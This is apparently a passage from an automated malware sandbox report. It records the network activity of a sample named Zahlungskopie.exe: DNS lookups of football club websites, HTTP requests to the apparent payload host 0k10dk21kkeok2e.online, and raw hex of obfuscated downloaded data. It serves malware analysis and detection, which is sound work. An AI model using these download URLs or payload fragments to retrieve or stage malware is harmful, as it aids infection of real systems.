                                                                                                                                                                                                                        Mar 2, 2021 20:09:11.408025980 CET5979453192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:11.453669071 CET53597948.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:11.504482031 CET5591653192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:11.552076101 CET53559168.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:11.557714939 CET5275253192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:11.618345976 CET53527528.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:12.364268064 CET6054253192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:12.416336060 CET53605428.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:13.524030924 CET6068953192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:13.572956085 CET53606898.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:14.446058035 CET6420653192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:14.493865013 CET53642068.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:26.695353031 CET5090453192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:26.756505013 CET53509048.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:37.135029078 CET5752553192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:37.183278084 CET53575258.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:09:48.398874998 CET5381453192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:09:48.444895983 CET53538148.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:33.684509039 CET5341853192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:33.730535984 CET53534188.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:44.537988901 CET6283353192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:44.597537041 CET53628338.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:55.559895039 CET5926053192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:55.646528959 CET53592608.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:56.091029882 CET4994453192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:56.148238897 CET53499448.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:56.665596962 CET6330053192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:56.733863115 CET53633008.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:57.221560955 CET6144953192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:57.305548906 CET53614498.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:57.916225910 CET5127553192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:57.988899946 CET53512758.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:58.434609890 CET6349253192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:58.486139059 CET53634928.8.8.8192.168.2.4
                                                                                                                                                                                                                        Mar 2, 2021 20:10:58.895148993 CET5894553192.168.2.48.8.8.8
                                                                                                                                                                                                                        Mar 2, 2021 20:10:58.959903002 CET53589458.8.8.8192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Mar 2, 2021 20:08:50.496838093 CET | 192.168.2.4 | 8.8.8.8 | 0x75e3 | Standard query (0) | www.chelseafc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.555720091 CET | 192.168.2.4 | 8.8.8.8 | 0x568c | Standard query (0) | www.chelseafc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.733742952 CET | 192.168.2.4 | 8.8.8.8 | 0x98ee | Standard query (0) | www.chelseafc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.791078091 CET | 192.168.2.4 | 8.8.8.8 | 0xb707 | Standard query (0) | www.chelseafc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.976568937 CET | 192.168.2.4 | 8.8.8.8 | 0x392f | Standard query (0) | www.manutd.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:51.044329882 CET | 192.168.2.4 | 8.8.8.8 | 0xf565 | Standard query (0) | www.manutd.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:51.220598936 CET | 192.168.2.4 | 8.8.8.8 | 0xc36c | Standard query (0) | www.manutd.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:51.276549101 CET | 192.168.2.4 | 8.8.8.8 | 0x194e | Standard query (0) | www.manutd.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:54.404633999 CET | 192.168.2.4 | 8.8.8.8 | 0x58b4 | Standard query (0) | www.mancity.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:54.475603104 CET | 192.168.2.4 | 8.8.8.8 | 0x5fa5 | Standard query (0) | www.mancity.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:54.659347057 CET | 192.168.2.4 | 8.8.8.8 | 0x12fe | Standard query (0) | www.mancity.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:54.722321033 CET | 192.168.2.4 | 8.8.8.8 | 0xbcbb | Standard query (0) | www.mancity.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:54.868302107 CET | 192.168.2.4 | 8.8.8.8 | 0x39b6 | Standard query (0) | 0k10dk21kkeok2e.online | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:57.374126911 CET | 192.168.2.4 | 8.8.8.8 | 0x50d5 | Standard query (0) | www.liverpoolfc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:57.455888987 CET | 192.168.2.4 | 8.8.8.8 | 0x7e24 | Standard query (0) | www.liverpoolfc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:57.613251925 CET | 192.168.2.4 | 8.8.8.8 | 0x4656 | Standard query (0) | www.liverpoolfc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:57.678607941 CET | 192.168.2.4 | 8.8.8.8 | 0xee4e | Standard query (0) | www.liverpoolfc.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:58.549834967 CET | 192.168.2.4 | 8.8.8.8 | 0x50af | Standard query (0) | www.realmadrid.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:58.621834040 CET | 192.168.2.4 | 8.8.8.8 | 0x7a30 | Standard query (0) | www.realmadrid.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:58.762552977 CET | 192.168.2.4 | 8.8.8.8 | 0x3cfd | Standard query (0) | www.realmadrid.com | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:58.823421955 CET | 192.168.2.4 | 8.8.8.8 | 0x4609 | Standard query (0) | www.realmadrid.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Mar 2, 2021 20:08:50.548437119 CET | 8.8.8.8 | 192.168.2.4 | 0x75e3 | No error (0) | www.chelseafc.com | chelseafc.map.fastly.net |  | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:08:50.548437119 CET | 8.8.8.8 | 192.168.2.4 | 0x75e3 | No error (0) | chelseafc.map.fastly.net |  | 151.101.2.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.548437119 CET | 8.8.8.8 | 192.168.2.4 | 0x75e3 | No error (0) | chelseafc.map.fastly.net |  | 151.101.66.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.548437119 CET | 8.8.8.8 | 192.168.2.4 | 0x75e3 | No error (0) | chelseafc.map.fastly.net |  | 151.101.130.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.548437119 CET | 8.8.8.8 | 192.168.2.4 | 0x75e3 | No error (0) | chelseafc.map.fastly.net |  | 151.101.194.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.613651037 CET | 8.8.8.8 | 192.168.2.4 | 0x568c | No error (0) | www.chelseafc.com | chelseafc.map.fastly.net |  | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:08:50.613651037 CET | 8.8.8.8 | 192.168.2.4 | 0x568c | No error (0) | chelseafc.map.fastly.net |  | 151.101.2.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.613651037 CET | 8.8.8.8 | 192.168.2.4 | 0x568c | No error (0) | chelseafc.map.fastly.net |  | 151.101.66.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.613651037 CET | 8.8.8.8 | 192.168.2.4 | 0x568c | No error (0) | chelseafc.map.fastly.net |  | 151.101.130.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.613651037 CET | 8.8.8.8 | 192.168.2.4 | 0x568c | No error (0) | chelseafc.map.fastly.net |  | 151.101.194.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.779699087 CET | 8.8.8.8 | 192.168.2.4 | 0x98ee | No error (0) | www.chelseafc.com | chelseafc.map.fastly.net |  | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:08:50.779699087 CET | 8.8.8.8 | 192.168.2.4 | 0x98ee | No error (0) | chelseafc.map.fastly.net |  | 151.101.2.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.779699087 CET | 8.8.8.8 | 192.168.2.4 | 0x98ee | No error (0) | chelseafc.map.fastly.net |  | 151.101.66.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.779699087 CET | 8.8.8.8 | 192.168.2.4 | 0x98ee | No error (0) | chelseafc.map.fastly.net |  | 151.101.130.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.779699087 CET | 8.8.8.8 | 192.168.2.4 | 0x98ee | No error (0) | chelseafc.map.fastly.net |  | 151.101.194.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.838902950 CET | 8.8.8.8 | 192.168.2.4 | 0xb707 | No error (0) | www.chelseafc.com | chelseafc.map.fastly.net |  | CNAME (Canonical name) | IN (0x0001)
Mar 2, 2021 20:08:50.838902950 CET | 8.8.8.8 | 192.168.2.4 | 0xb707 | No error (0) | chelseafc.map.fastly.net |  | 151.101.2.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.838902950 CET | 8.8.8.8 | 192.168.2.4 | 0xb707 | No error (0) | chelseafc.map.fastly.net |  | 151.101.66.133 | A (IP address) | IN (0x0001)
Mar 2, 2021 20:08:50.838902950 CET | 8.8.8.8 | 192.168.2.4 | 0xb707 | No error (0) | chelseafc.map.fastly.net |  | 151.101.130.133 | A (IP address) | IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:50.838902950 CET8.8.8.8192.168.2.40xb707No error (0)chelseafc.map.fastly.net151.101.194.133A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.037338972 CET8.8.8.8192.168.2.40x392fNo error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.119118929 CET8.8.8.8192.168.2.40xf565No error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.268189907 CET8.8.8.8192.168.2.40xc36cNo error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:51.330665112 CET8.8.8.8192.168.2.40x194eNo error (0)www.manutd.comwww.manutd.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.464396954 CET8.8.8.8192.168.2.40x58b4No error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.527645111 CET8.8.8.8192.168.2.40x5fa5No error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.714083910 CET8.8.8.8192.168.2.40x12feNo error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.771481037 CET8.8.8.8192.168.2.40xbcbbNo error (0)www.mancity.comwww.mancity.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.927212954 CET8.8.8.8192.168.2.40x39b6No error (0)0k10dk21kkeok2e.online104.21.59.148A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:54.927212954 CET8.8.8.8192.168.2.40x39b6No error (0)0k10dk21kkeok2e.online172.67.179.188A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.442032099 CET8.8.8.8192.168.2.40x50d5No error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.442032099 CET8.8.8.8192.168.2.40x50d5No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.442032099 CET8.8.8.8192.168.2.40x50d5No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.442032099 CET8.8.8.8192.168.2.40x50d5No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.442032099 CET8.8.8.8192.168.2.40x50d5No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.514110088 CET8.8.8.8192.168.2.40x7e24No error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.514110088 CET8.8.8.8192.168.2.40x7e24No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.514110088 CET8.8.8.8192.168.2.40x7e24No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.514110088 CET8.8.8.8192.168.2.40x7e24No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.514110088 CET8.8.8.8192.168.2.40x7e24No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.668900013 CET8.8.8.8192.168.2.40x4656No error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.668900013 CET8.8.8.8192.168.2.40x4656No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.668900013 CET8.8.8.8192.168.2.40x4656No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.668900013 CET8.8.8.8192.168.2.40x4656No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.668900013 CET8.8.8.8192.168.2.40x4656No error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.735830069 CET8.8.8.8192.168.2.40xee4eNo error (0)www.liverpoolfc.comd2hhwit6pbhmvu.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.735830069 CET8.8.8.8192.168.2.40xee4eNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.29A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.735830069 CET8.8.8.8192.168.2.40xee4eNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.34A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.735830069 CET8.8.8.8192.168.2.40xee4eNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.58A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:57.735830069 CET8.8.8.8192.168.2.40xee4eNo error (0)d2hhwit6pbhmvu.cloudfront.net99.86.159.103A (IP address)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.613145113 CET8.8.8.8192.168.2.40x50afNo error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.673063993 CET8.8.8.8192.168.2.40x7a30No error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.814052105 CET8.8.8.8192.168.2.40x3cfdNo error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:08:58.869771004 CET8.8.8.8192.168.2.40x4609No error (0)www.realmadrid.comrealmadrid.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:09:05.645148039 CET8.8.8.8192.168.2.40x5427No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                        Mar 2, 2021 20:09:08.949892044 CET8.8.8.8192.168.2.40x8278No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

HTTP Request Dependency Graph

• www.chelseafc.com
• 0k10dk21kkeok2e.online
• www.liverpoolfc.com

HTTP Packets

Session ID: 0
Source IP: 192.168.2.4
Source Port: 49719
Destination IP: 151.101.2.133
Destination Port: 80
Process: C:\Users\user\Desktop\Zahlungskopie.exe

Timestamp: Mar 2, 2021 20:08:50.681927919 CET
kBytes transferred: 484
Direction: OUT
Data:
GET / HTTP/1.1
User-Agent: Other
Host: www.chelseafc.com
Connection: Keep-Alive

Timestamp: Mar 2, 2021 20:08:50.722868919 CET
kBytes transferred: 485
Direction: IN
Data:
HTTP/1.1 302 Found
Retry-After: 0
Content-Length: 0
Location: https://www.chelseafc.com/en
Accept-Ranges: bytes
Date: Tue, 02 Mar 2021 19:08:50 GMT
Connection: close
Vary: Accept-Encoding, Accept-Language
Access-Control-Allow-Origin: *
X-Powered-By: Curiosity
X-Geo-Country_code: CH


Session ID: 1
Source IP: 192.168.2.4
Source Port: 49729
Destination IP: 104.21.59.148
Destination Port: 80
Process: C:\Users\user\Desktop\Zahlungskopie.exe

Timestamp: Mar 2, 2021 20:08:54.968324900 CET
kBytes transferred: 1160
Direction: OUT
Data:
GET /base/83650593F542427F159D29BCCFD755F9.html HTTP/1.1
User-Agent: Other
Host: 0k10dk21kkeok2e.online
Connection: Keep-Alive

Timestamp: Mar 2, 2021 20:08:55.200912952 CET
kBytes transferred: 1163
Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 02 Mar 2021 19:08:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da0b1b2a1770f6711ad92a3266a09263e1614712135; expires=Thu, 01-Apr-21 19:08:55 GMT; path=/; domain=.0k10dk21kkeok2e.online; HttpOnly; SameSite=Lax
Last-Modified: Mon, 01 Mar 2021 21:09:47 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 0895f0f55c00004e321599d000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=dqNIcbVpbwO2NBQ5ESskXMQW0xDjw0f7UXcFUVF9niTjiunG037%2BdB0jixI6PSyQZhzHpHlvBAL1N1uxKY3xjuk%2F77y6a%2B6ea4wZw2FbuseZNp9iNTai"}],"max_age":604800,"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 629cea9bcb7d4e32-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.201061964 CET1171INData Raw: 6f 6b 6f 6b 55 4b 6b 49 55 6b 4b 49 66 6b 55 66 6b 61 55 6b 55 4b 6b 63 62 6b 4b 49 66 6b 55 66 6b 55 61 6b 6f 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 57 57 6b 4b 49 66 6b 55 66 6b 55 61 6b 6f 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 55 6b 4b 49 66 6b 55 66 6b 55
                                                                                                                                                                                                                        Data Ascii: okokUKkIUkKIfkUfkaUkUKkcbkKIfkUfkUakokokokokUKkWWkKIfkUfkUakokokokokUKkIUkKIfkUfkUakokokokokUKkIckKIfkUfkaakUKkKaUkKIfkKKIkaKkokokKokokaIckKakKkokcokafkokokKokKKKkUKkokokKokokaIckKakUkokKKKkUokokokKokUKkKKokKcKkIakokokKkUfkUakKoWkokokokUKkKoKk
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.201083899 CET1172INData Raw: 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 4b 6f 6f 6b 4b 49 66 6b 55 66 6b 55 61 6b 57 62 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 6a 6b 4b 49 66 6b 55 66 6b 55 4b 6b 57 62 6b 55 4b 6b 62 61 6b 4b 49 66 6b 55 66 6b 55 61 6b 57 66 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 4b 6f
                                                                                                                                                                                                                        Data Ascii: kokokokUKkKookKIfkUfkUakWbkokokokUKkIjkKIfkUfkUKkWbkUKkbakKIfkUfkUakWfkokokokUKkKookKIfkUfkUakWfkokokokUKkIIkKIfkUfkUakWfkokokokUKkcbkKIfkUfkUKkWfkUKkcfkKIfkUfkUakWjkokokokUKkcWkKIfkUfkUakWjkokokokUKkIfkKIfkUfkUakWjkokokokUKkWWkKIfkUfkUKkWjkUK
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.201107979 CET1174INData Raw: 4b 6b 49 61 6b 4b 49 66 6b 55 66 6b 55 61 6b 62 63 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 55 6b 4b 49 66 6b 55 66 6b 55 4b 6b 62 63 6b 55 4b 6b 6a 62 6b 4b 49 66 6b 55 66 6b 55 61 6b 62 55 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 57 57 6b 4b 49 66 6b 55 66 6b 55
                                                                                                                                                                                                                        Data Ascii: KkIakKIfkUfkUakbckokokokUKkIUkKIfkUfkUKkbckUKkjbkKIfkUfkUakbUkokokokUKkWWkKIfkUfkUakbUkokokokUKkWfkKIfkUfkUakbUkokokokUKkIckKIfkUfkUKkbUkUKkKKjkKIfkUfkUakbakokokokUKkIfkKIfkUfkUakbakokokokUKkIckKIfkUfkUakbakokokokUKkKoKkKIfkUfkUKkbakUKkKKckKIf
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.201131105 CET1175INData Raw: 66 6b 55 61 6b 66 6f 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 63 6b 4b 49 66 6b 55 66 6b 55 4b 6b 66 6f 6b 55 4b 6b 66 6a 6b 4b 49 66 6b 55 66 6b 55 61 6b 6a 57 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 63 62 6b 4b 49 66 6b 55 66 6b 55 61 6b 6a 57 6b 6f 6b 6f 6b 6f
                                                                                                                                                                                                                        Data Ascii: fkUakfokokokokUKkIckKIfkUfkUKkfokUKkfjkKIfkUfkUakjWkokokokUKkcbkKIfkUfkUakjWkokokokUKkIKkKIfkUfkUakjWkokokokUKkIjkKIfkUfkUKkjWkUKkKookKIfkUfkUakjbkokokokUKkIckKIfkUfkUakjbkokokokUKkWbkKIfkUfkUakjbkokokokUKkWWkKIfkUfkUKkjbkUKkKKokKIfkUfkUakjfko
                                                                                                                                                                                                                        Mar 2, 2021 20:08:55.201786041 CET1176INData Raw: 6b 55 4b 6b 4b 6f 6f 6b 4b 49 66 6b 55 66 6b 55 4b 6b 49 6a 6b 55 4b 6b 55 63 6b 4b 49 66 6b 55 66 6b 55 61 6b 49 49 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 4b 6f 4b 6b 4b 49 66 6b 55 66 6b 55 61 6b 49 49 6b 6f 6b 6f 6b 6f 6b 55 4b 6b 49 66 6b 4b 49 66 6b
                                                                                                                                                                                                                        Data Ascii: kUKkKookKIfkUfkUKkIjkUKkUckKIfkUfkUakIIkokokokUKkKoKkKIfkUfkUakIIkokokokUKkIfkKIfkUfkUakIIkokokokUKkIKkKIfkUfkUKkIIkUKkUckKIfkUfkUakIckokokokUKkIfkKIfkUfkUakIckokokokUKkIakKIfkUfkUakIckokokokUKkIfkKIfkUfkUKkIckUKkUakKIfkUfkUakIUkokokokUKkWbkKI
Mar 2, 2021 20:08:56.150091887 CET | 2236 | OUT
GET /base/0A48866E716B370203D6A936495BDF28.html HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Other
                                                                                                                                                                                                                        Host: 0k10dk21kkeok2e.online
Mar 2, 2021 20:08:56.367968082 CET | 2245 | IN
HTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Tue, 02 Mar 2021 19:08:56 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Set-Cookie: __cfduid=d696250e97b654e4823691154837763731614712136; expires=Thu, 01-Apr-21 19:08:56 GMT; path=/; domain=.0k10dk21kkeok2e.online; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                        Last-Modified: Mon, 01 Mar 2021 21:09:49 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                        cf-request-id: 0895f0f9f700004e32e1b4d000000001
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HJfNTooJlDCkpIQk1k2cCvLNdbksx2F1qhEX2xPK0OsfuKfa2LdIQJVVFy4%2F9fIP2rW3Df3tX%2FFOca1FfxlRnYkZjU6YJCdiqb%2BoXLQaTP7jQTLQzWIT"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 629ceaa328c94e32-FRA
                                                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49733 | 99.86.159.29 | 80 | C:\Users\user\Desktop\Zahlungskopie.exe

Timestamp | kBytes transferred | Direction | Data
Mar 2, 2021 20:08:57.559750080 CET | 3343 | OUT
GET / HTTP/1.1
                                                                                                                                                                                                                        User-Agent: Other
                                                                                                                                                                                                                        Host: www.liverpoolfc.com
                                                                                                                                                                                                                        Connection: Keep-Alive
Mar 2, 2021 20:08:57.603986025 CET | 3343 | IN
HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                        Server: CloudFront
                                                                                                                                                                                                                        Date: Tue, 02 Mar 2021 19:08:57 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 183
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Location: https://www.liverpoolfc.com/
                                                                                                                                                                                                                        X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                        Via: 1.1 20f1bd00b8898dc48034147896cabd75.cloudfront.net (CloudFront)
                                                                                                                                                                                                                        X-Amz-Cf-Pop: MXP64-C2
                                                                                                                                                                                                                        X-Amz-Cf-Id: al8HpbvRKomJtSYRJGkdMV-z7mJgmxwuv0fEEvKhoo6OCRjJeZb-Ww==
                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                        HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
